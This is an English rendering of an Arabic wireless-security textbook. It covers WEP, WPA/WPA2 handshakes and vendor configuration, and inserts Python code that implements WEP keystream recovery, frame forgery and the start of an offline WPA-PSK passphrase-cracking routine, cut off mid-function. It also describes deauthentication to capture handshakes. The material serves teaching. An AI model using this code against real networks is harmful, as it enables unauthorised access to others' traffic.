Wireless Network Security (Arabic original; English rendering)


Preface

[The Arabic text of the preface did not survive extraction. What remains are references to the CCNP Wireless and CWNP certification tracks, to the Arabic networking communities wireless4arab.net and networkset, and to the Cisco WCS management platform used for the screenshots in the later chapters.]


2013/3/19

naderelmansi@gmail.com
Why wireless security is different

In a wired network the attacker's first problem is physical access. To reach the internal network he has to get into the building and find a free switch port or an existing cable, and only then can he obtain an IP address, sniff traffic or attach his own devices. The wired perimeter is also guarded by the usual controls: firewalls such as Cisco PIX and Microsoft ISA Server, proxies such as Bluecoat, and domain Group Policy that restricts what a connected machine may do.

A wireless network removes the physical barrier. The access point broadcasts its SSID over the air, and every station within radio range can see the network, send an association request and, if it succeeds, obtain an address and open sessions exactly as a wired insider would, without ever touching a port. The OSI layers and the protocols running on them are the same as in the wired network; what changes is that the medium itself is open.

Wireless security therefore cannot rely on controlling who can plug in. It has to be built into the logic of the network: who is allowed to associate, how a station proves its identity before it gets an address, and how every frame is protected while it is in the air.




Web authentication and the OSI layers

Walking up the OSI model shows where each wireless security control sits:

Start (Layer 1, Physical): the station listens on the radio channels, receives the beacons and picks the SSID it wants to join.

Layer 2, Data Link: the station authenticates and associates with the access point. If the network is open, any station can associate and is then handed an address by DHCP. If layer 2 security is configured (WEP, IEEE 802.1X, WPA or WPA2), the station must prove possession of the key or credentials before any of its frames are forwarded.

Layer 3, Network (DHCP and IP): the station obtains an IP address. On an open network this is where web authentication is applied: the controller intercepts the client's first HTTP request and redirects it to a login page, and no other traffic passes until the user has authenticated.

Layer 4, Transport: TCP and UDP sessions are opened. Mobility, keeping the same IP address and the same TCP/IP sessions while the station moves between access points, is handled here.

Layer 5, Session: the client's session with the network has to survive roaming from one access point to another.

Layers 6 and 7, Presentation and Application: the data the applications exchange, which is what every control at the lower layers exists to protect.
Threats to wireless networks

A wireless network inherits every threat that exists on the wired network it is attached to, and adds a set of its own that come from the open medium. The main ones are rogue access points and rogue clients, ad hoc networks, and client misassociation.


Rogue AP and Rogue Clients

[Figure: an authorized AP and a rogue AP both connected to trunk ports of the L2 switched network, a client attached to the rogue AP, and a rogue detector AP watching the wired side for the rogue client's ARP traffic.]

A rogue access point is any AP attached to the network without the administrator's knowledge or permission, for example an employee's own AP plugged into a wall jack for convenience. It bypasses every control configured on the authorized APs and gives anyone within radio range a direct path into the wired network. A rogue client is a station that is not authorized to use the network but associates with it, either through the rogue AP or by exploiting a weakness of an authorized one. A rogue detector is an AP dedicated to watching the wired side: it sees the ARP traffic of the rogue AP's clients on the switched network and reports the rogue to the controller.


AD HOC Network

[Figure: two computers connected directly to each other over wireless (an ad hoc network), one of them also connected to the corporate network and the Internet.]

In an ad hoc (IBSS) network two stations talk to each other directly without an access point. Wireless cards form such networks easily, and a laptop that is on the wired corporate network and at the same time a member of an ad hoc network bridges the two. The administrator has no visibility of or control over such a link, and any station that joins the ad hoc network can reach the corporate network through the bridging laptop.


Client misassociation

Client misassociation is a corporate station associating with a network it was not meant to use: a neighbouring company's network, a public hotspot, or an attacker's AP that advertises the same SSID as the corporate network. A station configured to connect automatically to any network with a familiar SSID does this without the user noticing, and from then on its traffic, credentials and file shares are exposed to whoever runs that network.


Wireless attack

Attacks on wireless networks fall into two groups, passive and active.

Passive attack

A passive attack changes nothing on the network. The attacker captures the frames that are in the air (probes, beacons, data) with a wireless sniffer and then analyzes what he collected: which networks exist, which security they use, which clients talk to which AP, and, given enough captured traffic, the encryption key itself. Because nothing is transmitted, a passive attack is very hard to detect, and the traffic it gathers is the raw material for the active attacks that follow.

Active Attack

An active attack interacts with the network. Examples are bringing up a Rogue AP that impersonates the legitimate network, taking a man-in-the-middle position between the client and the AP, and injecting or modifying frames. The attacker's goal is to reach the network, its clients and the data they exchange, not merely to listen.
Authentication and encryption

[Figure: a wireless client, an access point and a switch, with an attacker within radio range; the two controls drawn between client and AP are Authentication and Encryption.]

The two pillars of wireless security are authentication and encryption. In a wired network the switch port and the cable already restrict who can send frames and who can see them. On the air anyone can capture frames and anyone can transmit, so every frame exchanged between client and access point must be encrypted, and the client must be authenticated before it is allowed onto the network.


Authentication

Authentication is the process by which the network verifies the identity of the device or user that wants to join, and refuses the association if the proof is wrong. In wireless networks it takes place at Layer 2 (Data Link), before the station is given an IP address at Layer 3 (Network); an unauthenticated station therefore never reaches the IP network at all.


Authentication User

A user can be authenticated by three kinds of factor:

- something you know, such as a password or a key configured on the client;

- something you have, such as a smart card or a certificate on a token;

- something you are, a biometric such as a fingerprint.


Authentication Devices

The network may authenticate the user or the device, and the two are not the same thing. When the password is stored on the device (a key typed once into the wireless profile), anyone who uses the device is authenticated, so user authentication collapses into device authentication. Authenticating the user separately requires a credential tied to the person, such as a certificate and signature that only that user can produce, rather than a secret the device keeps.
Encryption

[Figure: the plain text "Computers were invented as a natural progression from a calculating mathematical machine..." passes through the encryption process (the cipher) under a key and becomes unreadable cipher text; the reverse process with the same key returns the plain text.]

Encryption transforms readable data (plaintext) into an unreadable form (ciphertext) using an algorithm, the cipher, and a key. Only a party holding the right key can reverse the process, and that reverse process is decryption. The cipher itself can be public; the secrecy of the data rests entirely on the secrecy of the key.

Encryption is divided into two families, symmetric and asymmetric.
Symmetric encryption

In symmetric encryption the cipher uses the same key for encryption and for decryption. Both parties must hold that key before they can communicate, so the hard part is distributing it securely. It is fast, which is why the ciphers used on the wireless link (RC4 in WEP and TKIP, AES in WPA2) are symmetric.


Asymmetric encryption

In asymmetric encryption the cipher uses two different but mathematically related keys: what one key encrypts only the other can decrypt. One is published (the public key) and the other kept secret (the private key), so the two parties do not have to share a secret in advance. It is much slower than symmetric encryption, and in wireless networks it appears in the authentication phase (certificates in EAP-TLS and PEAP), not in the encryption of the data frames.


Key Management

With symmetric keys the administrator has to choose between a Common Key and Individual Keys.

[Figure: three users sharing one "Blue" key, versus three users holding their own "Blue", "Red" and "Green" keys.]

Common Key: every user of the network shares the same key. It is easy to deploy and to manage, but one user who leaves, or one compromised device, exposes the traffic of everybody, and changing the key means reconfiguring every client.

Individual Keys: every user holds a key of his own, so a compromise affects only that user and a key can be revoked without touching anyone else. The price is a key management system (in wireless networks, a RADIUS server and 802.1X) to create, distribute and rotate the keys.
Wired Equivalent Privacy (WEP)

WEP is the encryption algorithm defined in the IEEE 802.11 standard (the 1999 edition) to give wireless networks data confidentiality equivalent to what a wired network gets from its cables. It was the first security mechanism available for wireless networks and for several years the only one.

Serious weaknesses were found in it from 2001 onwards, and it was formally deprecated by IEEE 802.11i. In the meantime the Wi-Fi Alliance published Wi-Fi Protected Access (WPA) as its replacement. WEP is nevertheless still met in the field, and understanding how it works, and why it fails, is the basis for understanding everything that came after it.
A WEP-encrypted wireless packet has the following layout:

802.11 Header
BSS ID
Initialization Vector (IV)
Destination Address
Logical Link Control
Sub Network Access Protocol Header
Data
Integrity Check Value (CRC32)

- 802.11 Header: the frame header of the wireless MAC layer, sent in the clear.
- BSS ID (Basic Service Set Identifier): the MAC address of the AP's radio, which identifies the network the frame belongs to.
- IV (initialization vector): a 24-bit value that changes from frame to frame and is sent in the clear; together with the WEP Key it forms the RC4 key for this frame.
- Data and ICV: the LLC/SNAP header, the payload and the 32-bit CRC Integrity Check Value are the encrypted part of the frame.


WEP key and cipher

WEP encrypts the data with the RC4 stream cipher (Ron's Code 4, a symmetric algorithm) using a key system made of two parts: the static WEP Key configured on the AP and on every client, and the 24-bit initialization vector (IV) chosen per frame. The IV is prepended to the WEP key, and the name of the key system counts both: a 40-bit WEP key with the 24-bit IV is called 64-bit WEP, a 104-bit key is called 128-bit WEP, and a 232-bit key is called 256-bit WEP.


64-bit WEP (WEP-40) uses a 10-character hexadecimal key (digits 0-9 and A-F); each hex character is 4 bits, giving 40 bits, plus the 24-bit IV = 64 bits for RC4. Most devices also accept the key as 5 ASCII characters, which they convert to the same 40 bits.

128-bit WEP (WEP-104) uses a 26-character hexadecimal key: 104 bits plus the 24-bit IV = 128 bits for RC4 (13 ASCII characters).

256-bit WEP (WEP-232), offered by some vendors, uses a 58-character hexadecimal key: 232 bits plus the 24-bit IV = 256 bits for RC4.

In general:

(hex characters x 4 bits = WEP key) + 24-bit IV = WEP system size

RC4 takes IV || WEP key and produces a keystream; the plain text of the frame (data plus ICV) is XORed with the keystream to give the cipher text. The receiver, knowing the key and reading the IV from the frame, regenerates the same keystream and XORs it back to recover the data.
WEP Engine

[Figure: the WEP engine: the IV and the WEP key feed RC4; the resulting keystream is XORed with the plain text and its CRC-32 ICV to give the cipher text, which is sent behind the clear-text IV.]


WEP authentication

WEP offers two authentication methods: Open System and Shared Key.

Open System authentication is no authentication at all: every station that asks is accepted and can then associate with the AP. If WEP encryption is enabled, a station with the wrong key still authenticates and associates, but its frames do not decrypt and it cannot actually exchange data with the network.

802.11 Authentication, Open System steps (client attempting to connect, access point):

1) Authentication request sent to AP

2) AP authenticates

3) Client connects to network


On the Cisco wireless LAN controller this is set on the WLAN under WLANs > Edit > Security > Layer 2 (Layer 2 Security settings).

[Screenshot: WLANs > Edit, tabs General / Security / QoS / Advanced; under Security the sub-tabs Layer 2 / Layer 3 / AAA Servers; Layer 2 Security: None; MAC Filtering unchecked.]

Shared Key authentication, by contrast, uses the WEP key itself to authenticate. The AP sends the client a clear-text challenge; the client encrypts it with the WEP key and sends it back; the AP decrypts the reply and, if it recovers the original challenge, authenticates the client, which can then associate.

802.11 Authentication, Shared Key steps (client attempting to connect, access point):

1) Authentication request sent to AP

2) AP sends challenge text

3) Client encrypts challenge text and sends it back to AP

4) AP decrypts, and if correct, authenticates client

5) Client connects to network

[Figure: the shared-key exchange between a client, the access point and the wired network behind it.]

It looks stronger than Open System, but it is in fact weaker. An attacker who captures one shared-key exchange holds both the clear-text challenge and the encrypted challenge, and XORing the two gives him the RC4 keystream for the IV the client used. With that keystream he can encrypt any challenge the AP sends him later, and so authenticate to the network without knowing the key at all. Shared Key authentication hands the attacker exactly the known-plaintext pair that WEP can least afford to give away, which is why vendors recommend Open System authentication even when WEP encryption is used.


Configuring static WEP on the Cisco wireless LAN controller is done on the same page, WLANs > Edit > Security > Layer 2 (Layer 2 Security settings), by choosing Static WEP and entering the key.

[Screenshot: WLANs > Edit > Security > Layer 2; Layer 2 Security: Static WEP; MAC Filtering unchecked; Static WEP Parameters: 802.11 Data Encryption, Current Key: 104 bits WEP Static Key (Key Index = 1); checkbox "Allow Shared Key Authentication"; fields Type, Key Size, Key Index, Encryption Key, Key Format (ASCII).]

On a Cisco Aironet access point running IOS software the same is configured from the web interface:

[Screenshot: Aironet web interface, Security > Encryption Manager: Encryption Modes (None / WEP Encryption Mandatory or Optional / Cipher); Encryption Keys 1 to 4, each with a Transmit Key selection, the Encryption Key value and the Key Size.]

[Screenshot: Aironet web interface, Express Security Set-Up: SSID Configuration (SSID "tsunami", Broadcast SSID in Beacon); VLAN (No VLAN / Enable VLAN ID 1-4095, Native VLAN); Security: No Security / Static WEP Key (128 bit) / EAP Authentication (RADIUS Server hostname or IP, RADIUS Server Secret) / WPA (RADIUS Server, RADIUS Server Secret). Menu on the left: Network Map, Association, Network, Interfaces, Security, Services, Wireless Services, System Software, Event Log.]

The same configuration from the Cisco IOS command line follows further below.




On a home router, here a Linksys, WEP is configured on the Wireless Security page:

[Screenshot: Linksys Wireless Security: Security Mode WEP; Encryption 40/64-bit (10 hex digits); Key 1; Authentication Auto; "Enter the password here".]

[Screenshot: Linksys WEP key page: Passphrase with "Generate Keys" (the passphrase feature generates the four WEP keys from simple text; it is compatible with other Linksys products, other vendors may need manual key entry); Default Key 1-4; Key 1 to Key 4 for manual entry; Authentication Type: Open System / Shared Key / Both. The page warns that all wireless devices on the 2.4 GHz (802.11b) network must use the same encryption level and key, and that WEP keys consist of the letters "A" through "F" and the numbers "0" through "9".]

To configure WEP from the Cisco IOS command line, enter the radio interface: interface dot11radio 0 is the 2.4 GHz radio (802.11b/g) and interface dot11radio 1 is the 5 GHz radio (802.11a). The following example sets a 128-bit (26 hexadecimal digit) WEP key, 12345678901234567890123456, as key 1 and transmit key for VLAN 22:


ap1200# configure terminal
ap1200(config)# interface dot11radio 0
ap1200(config-if)# encryption vlan 22 key 1 size 128bit 12345678901234567890123456 transmit-key
ap1200(config-if)# end


On the client side, a Cisco Aironet adapter is configured with the Aironet Client Utility (ACU), where the same key is entered in the profile.

On Windows with Wireless Zero Configuration (WZC) the network is added through Setup a New Connection or Network, or by selecting it in the list of available networks and entering the key. Network Connections shows the wireless adapter and its properties next to the wired adapters.

On Linux the steps are similar. The distributions differ (Ubuntu, Debian, Fedora, BackTrack, Sabily, gOS) and so do the desktops (GNOME, Unity, KDE), but each has a Network Settings dialog in which the wireless connection, the ESSID and the WEP key are entered, and the same can be done from the terminal.
[Screenshot: GNOME Network Settings, Connections tab: Wireless connection (Essid: EcolaCreekWiFi), Wired connection (roaming mode enabled), Modem connection; the Properties dialog: Enable roaming mode; Wireless Settings: Network name (ESSID) TheCafe, Password type: WEP key (ascii), Network password; Connection Settings: Configuration: Automatic configuration (DHCP), IP address, Subnet mask, Gateway address.]


From the terminal, bring the interface down, set the ESSID and the WEP key with iwconfig (here the 10 hexadecimal digit 40-bit key abcabc1234), then bring the interface up again:

sudo ifdown wlan0
sudo iwconfig wlan0 essid TheCafe key abcabc1234
sudo ifup wlan0

(wlan0 is the name of the wireless interface and TheCafe the network name from the screenshot above; substitute your own.)


WEP weaknesses

The integrity check is CRC-32, a linear checksum designed to detect transmission errors, not a cryptographic MAC. An attacker can flip bits in an encrypted frame and fix up the encrypted ICV so that the frame still verifies.

The keystream depends on the WEP key and the IV, but the IV is only 24 bits long and is sent in the clear, so the network starts reusing IVs after a few thousand frames: on a busy network the chance of a repeated IV passes 50% after about 5,000 frames. Two frames encrypted under the same IV share the same keystream, and XORing them cancels the keystream and leaves the XOR of the two plain texts; with a known or guessable plain text (DHCP, ARP, IP headers) the attacker recovers the keystream and then the data of other frames under that IV.

Finally, the first bytes of RC4 keystream leak information about the key when the IV takes certain values, which is what the statistical attacks in tools such as aircrack-ng exploit: given enough captured IVs, and packet injection to generate them faster, the WEP key is recovered in minutes regardless of its length. The capture below shows aircrack-ng with only 156 IVs, far too few, asking for 5,000 before the next attempt.
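The WEP engine described under WEP Engine, the Shared Key exchange, and the three weaknesses listed above, as one added worked example in Python. This code is not from the book or from any vendor or tool; it implements RC4 and the WEP frame body (IV || RC4(data || CRC-32)) directly from the description, simplifies the 802.11 framing to IV || encrypted body (no 802.11 header or key-index byte), and uses constructed frames with the 40-bit key abcabc1234 that appears in the iwconfig line above:

```python
# Added example, not the book's code: a minimal WEP engine and the three attacks
# the text describes (shared-key keystream recovery, IV reuse, CRC-32 bit flips).
# Assumptions: frames are simplified to IV (3 bytes, clear) || RC4(data || ICV);
# no 802.11 header or key-index byte; keys are 40-bit (5 bytes) or 104-bit (13).
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling followed by `length` bytes of keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP Integrity Check Value: CRC-32 of the plain text, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(wep_key: bytes, iv: bytes, data: bytes) -> bytes:
    """IV || (data || ICV) XOR RC4(IV || WEP key). The IV travels in the clear."""
    assert len(iv) == 3 and len(wep_key) in (5, 13)
    ks = rc4_keystream(iv + wep_key, len(data) + 4)
    return iv + xor(data + icv(data), ks)


def wep_decrypt(wep_key: bytes, frame: bytes):
    """Regenerate the keystream from the clear IV; return data, or None if the ICV fails."""
    iv, body = frame[:3], frame[3:]
    dec = xor(body, rc4_keystream(iv + wep_key, len(body)))
    data, tag = dec[:-4], dec[-4:]
    return data if icv(data) == tag else None


# Weakness 1: Shared Key authentication. The attacker sniffs the clear-text
# challenge and the client's encrypted reply; XORing them yields IV and keystream.
def keystream_from_shared_key_auth(challenge: bytes, response: bytes):
    return response[:3], xor(challenge + icv(challenge), response[3:])


def forge_auth_response(iv: bytes, ks: bytes, new_challenge: bytes) -> bytes:
    """Answer a later challenge with the recovered keystream; no key needed."""
    return iv + xor(new_challenge + icv(new_challenge), ks)


# Weakness 2: IV reuse. Same IV => same keystream => c1 XOR c2 == p1 XOR p2.
def xor_of_plaintexts(frame1: bytes, frame2: bytes) -> bytes:
    assert frame1[:3] == frame2[:3], "only meaningful for frames sharing an IV"
    return xor(frame1[3:], frame2[3:])


# Weakness 3: CRC-32 is linear: crc(p XOR d) == crc(p) XOR crc(d) XOR crc(0^n),
# so plaintext bits can be flipped in the cipher text and the ICV fixed up blind.
def flip_bits(frame: bytes, delta: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    assert len(delta) == n
    tag_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(n))
    new_body = xor(body[:n], delta) + xor(body[n:], struct.pack("<I", tag_delta))
    return iv + new_body


if __name__ == "__main__":
    key = bytes.fromhex("abcabc1234")   # the 40-bit key from the iwconfig line
    frame = wep_encrypt(key, b"\x01\x02\x03", b"GET /index.html")
    print(wep_decrypt(key, frame))
```

None of the three attacks needs the key: the first yields a keystream from one captured authentication, the second turns an IV collision into plaintext XOR, and the third edits a frame in transit while the receiver's ICV check still passes; this is why WPA replaced CRC-32 with a keyed MIC and the 24-bit IV with a 48-bit counter.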




Aircrack-ng 1.1

[00:00:08] Tested 1705777 keys (got 156 IVs)

KB   depth    byte(vote)
 0   255/256  1B(   0) 78(   0) 7A(   0) 7B(   0) 7C(   0)
 1    33/ 34  C0( 512) DF( 256) 04( 256) 06( 256) 07( 256)
 2   110/  2  6B( 256) C5(   0) C9(   0) CC(   0) CE(   0)
 3    76/  3  8C( 256) 8E( 256) 96( 256) 98( 256) 9B( 256)
 4     1/     66( 768) 81( 512) E1( 512) 75( 512) FD( 512)

Failed. Next try with 5000 IVs.


The first published attack on WEP came in August 2001 from Scott Fluhrer, Itsik Mantin and Adi Shamir (the FMS attack). It exploits a weakness in RC4's key scheduling: for certain "weak" IVs the first byte of keystream is strongly correlated with one byte of the key, and since the first plain-text byte of every frame is known (the SNAP header), the attacker can collect those frames passively and vote on the key one byte at a time. The attack needs no interaction with the network and recovers the key, whatever its length, given enough frames; WEP has been considered broken since.

Vendors reacted within the limits of the existing hardware. Agere Systems shipped WEPplus (WEP+), which avoids the weak IVs, but it only helps when both ends of the link use it, and later attacks no longer depend on weak IVs. Another approach was Dynamic WEP, offered by 3Com among others, which uses IEEE 802.1X and the Extensible Authentication Protocol (EAP) to authenticate the client and deliver a per-session, periodically rotated WEP key instead of a static one; it limits what an attacker gains from one key but leaves the cipher and the integrity check unchanged. The real fix was WPA.
IEEE 802.11i/WPA2

The collapse of Wired Equivalent Privacy (WEP) led the IEEE to form a task group for a new security standard, IEEE 802.11i, and the Wi-Fi Alliance, the industry body that certifies Wi-Fi equipment, to publish an interim solution that existing hardware could run.

Wi-Fi Protected Access (WPA) was released by the Wi-Fi Alliance in 2003, before 802.11i was finished, as a replacement for WEP. It is based on the third draft of 802.11i and was designed so that most existing WEP hardware could support it with a firmware upgrade, since it keeps the RC4 cipher.

IEEE 802.11i, marketed by the Wi-Fi Alliance as WPA2, is the full standard, ratified in 2004 (IEEE 802.11i-2004). It is the security mechanism of every device certified since then; devices made before 2003 may gain WPA through a firmware update but generally not WPA2, which needs AES hardware.


WPA improvements

WPA uses the Temporal Key Integrity Protocol (TKIP), which derives a fresh 128-bit key for every packet from the temporal key, the transmitter's MAC address and a packet sequence counter, instead of the single static 40-bit or 104-bit key that WEP reuses for every frame. AES encryption may optionally be used in place of TKIP on hardware that supports it.
WPA also replaces WEP's cyclic redundancy check (CRC) with a cryptographic message integrity check (MIC), the algorithm called Michael, computed with a key the attacker does not have. An attacker who captures a frame can no longer modify it and fix up the check value, and the sequence counter included in TKIP prevents replaying captured frames. WPA2 goes further and replaces RC4 and Michael altogether with AES-CCMP.


WPA Authentication Modes

WPA and WPA2 come in two modes, WPA Personal and WPA Enterprise, which differ in how the client is authenticated and how the master key is obtained:

Enterprise (802.1X Authentication):
- authentication server required;
- RADIUS used for authentication and key distribution;
- centralized access control;
- encryption uses TKIP, AES optional.

Personal (PSK Authentication):
- authentication server not required;
- shared secret used for authentication;
- local access control;
- encryption uses TKIP, AES optional.


WPA Personal

[Screenshot: Windows "Manually connect to a wireless network": Network name 8B7J4, Security type WPA-Personal, Encryption type TKIP, Security Key (Hide characters), Start this connection automatically, Connect even if the network is not broadcasting (warning: if you select this option, your computer's privacy might be at risk).]

WPA Personal, also called WPA-PSK, authenticates with a pre-shared key: the same passphrase is configured on the access point and on every client and is used to derive the master key, with no RADIUS server. It was designed for home and small office (SOHO) networks that cannot run an authentication server. The difference from WEP is that the pre-shared key (PSK) is never used directly to encrypt frames: it only seeds the key exchange between the client and the access point, from which fresh per-session and per-packet keys are derived.

WPA Enterprise

[Screenshot: Windows "Manually connect to a wireless network": Network name eduroam, Security type WPA2-Enterprise, Encryption type AES, Security Key greyed out, Start this connection automatically, Connect even if the network is not broadcasting.]

WPA Enterprise authenticates each user through IEEE 802.1X and EAP against a RADIUS server. The EAP method is chosen by the administrator; common ones are EAP-TLS (Transport Layer Security, with client certificates), EAP-TTLS, and PEAP (Protected EAP) carrying MS-CHAP v2 [Microsoft Challenge Handshake Authentication Protocol], which authenticates the user with a domain username and password inside a TLS tunnel.

[Figure: Supplicant, Authenticator (the access point) and Authentication Server; the exchange runs top to bottom:]

1. Security capability discovery (beacons and probe responses advertise the supported ciphers and authentication methods).
2. 802.1X authentication between the supplicant and the authentication server, relayed by the authenticator.
3. 802.1X key management: RADIUS-based distribution of the Pairwise Master Key (PMK) from the authentication server to the authenticator.
4. Four-way key handshake between supplicant and authenticator.
5. Two-way group key handshake.
key distribution 
How the keys are established

As in any wireless network, the client first discovers the access point with probe request and probe response frames and learns which security the network requires. It then authenticates, and the result of that authentication, whether a successful 802.1X/EAP exchange or simply possession of the pre-shared key, is a master key known to both sides: the Pairwise Master Key (PMK). In Enterprise mode the authentication server derives it and sends it to the access point over RADIUS; in Personal mode both sides derive it from the passphrase.

From the PMK the two sides run the four-way handshake, which produces the Pairwise Transient Key (PTK) that protects unicast traffic between this client and this access point. A further exchange, the two-way group key handshake, delivers the Group Transient Key (GTK) from the authenticator to the client for broadcast and multicast traffic.


Unicast Keys: Four-Way Handshake

[Figure: Client and AP, both holding the PMK.]

1. The access point generates a random number (ANonce) and sends it to the client.
2. The client derives the PTK, then sends its own random number (SNonce) together with a MIC and its WPA information element.
3. The access point derives the PTK, verifies the MIC, and sends the client its own WPA information element with a MIC.
4. The client confirms with a "PTK done" message carrying a MIC; both sides install the temporal key (TK).

The four-way handshake thus produces a fresh Pairwise Transient Key (PTK) for every association from the Pairwise Master Key (PMK), which itself never goes on the air.

The WPA four-way handshake serves to:

- confirm that the Supplicant and the Authenticator hold the same PMK;

- derive the pairwise temporal keys;

- install those keys for the encryption of the frames that follow.
Before the four-way handshake can start, the Pairwise Master Key has to exist on both sides, as the result of 802.1X authentication between the client and the authentication server or of the pre-shared key. The handshake then runs as follows.

First, the AP sends the client a Nonce (ANonce), a random number used once, for this session only.

Second, the client combines the PMK, the ANonce, its own SNonce and the MAC addresses of the client and the AP in a pseudo-random function (PRF) to derive the PTK. It sends the SNonce to the AP in a frame that carries a MIC (message integrity check) computed with part of the PTK, which lets the AP verify that the client holds the correct PMK.

Third, the AP derives the same PTK, checks the MIC, and replies with a frame, also protected by a MIC, that tells the client to install the key; in WPA2 this frame also carries the group key (GTK), encrypted.

Fourth, the client acknowledges, and both sides install the keys. Only now is the 802.1X port unblocked and data traffic allowed through.

The PTK derived in the handshake is 512 bits (64 bytes) long for TKIP and is split into these parts:

- the first 16 bytes are the EAPOL-Key Confirmation Key (KCK), used to compute the MIC on the EAPOL-Key handshake frames;

- the next 16 bytes are the EAPOL-Key Encryption Key (KEK), used to encrypt the data (such as the GTK) sent to the client inside the handshake frames;

- the next 16 bytes are the Temporal Key (TK), the key that actually encrypts unicast data packets;

- the last two 8-byte parts are the Michael MIC keys, one for frames sent by the AP and one for frames sent by the client, used to compute the Michael MIC on data packets.

Group Key Handshake

[Figure: the AP, holding the PMK, generates a group random number and the group key; it encrypts the GTK with the KEK and sends it with a MIC; the client decrypts the GTK and replies "GTK done" with a MIC; data traffic is unblocked on both sides.]

The Group Transient Key (GTK) protects the broadcast and multicast traffic that the access point sends to all its clients, and is delivered by the two-way group key handshake that follows the four-way handshake.

First, the authenticator sends the client a new GTK, encrypted with the KEK from that client's PTK, in a frame carrying a MIC.

Second, the client decrypts and installs the GTK and acknowledges with a frame carrying a MIC.

For TKIP the GTK is 32 bytes long and is split in two: the first 16 bytes are the Temporal Key (TK) used to encrypt broadcast and multicast data packets, and the remaining 16 bytes are the two 8-byte Michael MIC keys.

WPA Encryption

[Figure: the values that enter TKIP key mixing: the temporal key, the transmitter's MAC address and the packet sequence counter.]

WPA's authentication and key establishment fix one problem; the encryption itself is the other, and here WPA offers two choices, TKIP and AES.

AES is a block cipher that owes nothing to the RC4 design used by WEP, and it requires new hardware. TKIP, the Temporal Key Integrity Protocol, was designed to run on the WEP hardware already deployed, so it keeps RC4 as the cipher but wraps it in a new key scheme: the key is 128 bits instead of WEP's 40-bit key, and it is a per-packet key rather than a single static one.

The initialization vector that made WEP fail was changed as well. WEP's 24-bit IV repeats within hours on a busy network; TKIP uses a 48-bit IV, the TKIP sequence counter, which gives 2^48 (about 281 trillion) values and would take hundreds of years to wrap at wireless data rates. The counter also serves as a replay check: a frame whose counter is not higher than the last one received is dropped.

TKIP then mixes the temporal key from the PTK with the transmitter's MAC address and the sequence counter in a two-phase key mixing function, so every packet is encrypted with its own RC4 key and no two packets, and no two stations, use the same one. Because the key changes with every packet, capturing traffic under one key tells the attacker nothing about the next packet, which defeats the statistical attacks that broke WEP.


Message Integrity Check
The last element of WPA is the Message Integrity Code (MIC), known as Michael. It adds a 64-bit (8-byte) value to each packet,computed with a key that only the two ends of the link hold, so the receiver can verify that the packet was sent by a holder of the key and was not modified on the way; this is what IEEE 802.11i required in place of WEP's CRC.

Even with the new IV, the MIC and the per-packet keys, WPA has a weakness, and it lies in WPA-PSK, the mode used in small office and home (SOHO) networks. The pre-shared key is a passphrase chosen by a person, and the four-way handshake that proves its possession can be captured and verified offline. The attacker does not even have to wait for a client to connect: deauthentication frames are not authenticated in 802.11, so he sends a forged deauthentication to a connected client, the client reconnects, and the handshake is captured. He then tries candidate passphrases from a dictionary against the captured handshake until the MIC matches. A weak passphrase is therefore as fatal as a weak WEP key, and this, together with the known weaknesses of TKIP, is the reason to move to WPA2 with a strong passphrase or, better, to Enterprise mode.

[Figure: the attack on WPA-PSK. The wireless station and the AP share the pre-programmed PSK; after the 802.11 security capabilities discovery and the WPA key management (generate and install PTK and GTK), the attacker sniffs the ANonce, the SNonce, the access point's MAC address and the station's MAC address, and derives PTK = EAPoL-PRF(PMK, ANonce | SNonce | AP MAC Addr | STA MAC Addr), where the PMK is a function of the PSK supplied by a pre-computed dictionary.]
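The four-way handshake described under Unicast Keys: Four-Way Handshake and the dictionary attack on WPA-PSK just described, as one added worked example in Python. The code is written here from the IEEE 802.11i definitions (PBKDF2 for the PMK, PRF-512 for the PTK, HMAC-MD5 or HMAC-SHA1 for the EAPOL-Key MIC) and is not the book's or any tool's code. The SSID EcolaCreekWiFi is taken from the earlier screenshot; the MAC addresses, nonces, passphrase and EAPOL-Key frame are constructed, and the attacker's vantage point is exactly the one in the figure: both MACs, both nonces and the MIC of message 2, with the PMK supplied by a wordlist.

```python
# Added example, not the book's code: WPA/WPA2-Personal key derivation and the
# offline dictionary attack on a captured four-way handshake, written from the
# IEEE 802.11i definitions (PBKDF2 for the PMK, PRF-512 for the PTK, EAPOL-Key MIC).
# All handshake values below are constructed, not a real capture; the EAPOL-Key
# frame is a placeholder byte string with its MIC field already zeroed.
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... concatenated."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    Split as KCK(16) || KEK(16) || TK(16) || Michael TX key(8) || Michael RX key(8);
    CCMP uses only the first 48 bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 64)
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48],
            "mic_tx": ptk[48:56], "mic_rx": ptk[56:64]}


def eapol_mic(kck: bytes, eapol_frame: bytes, ccmp: bool) -> bytes:
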